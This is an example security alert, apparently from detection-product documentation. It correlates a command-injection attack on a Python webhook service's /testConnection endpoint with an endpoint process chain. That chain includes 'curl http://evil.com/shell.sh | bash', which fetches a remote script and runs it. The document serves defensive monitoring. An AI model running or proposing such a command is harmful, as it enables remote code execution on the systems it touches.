Example alert

CRITICAL — Exploited Attack with Suspicious Execution (Risk Score: 99)
--- ADR Detection ---
Attack: cmd-injection
Application: cargo-cats-webhookservice (Python)
Endpoint: POST /testConnection
Sink: subprocess.run()
Source IP: 10.1.1.128
Result: EXPLOITED
--- EDR Detection ---
Product: [EDR product name]
Process: python → bash → curl http://evil.com/shell.sh | bash
Process path: /usr/bin/bash
Parent: /usr/bin/python3
User: appuser
--- Correlation ---
Join: Target hostname match within 30-minute window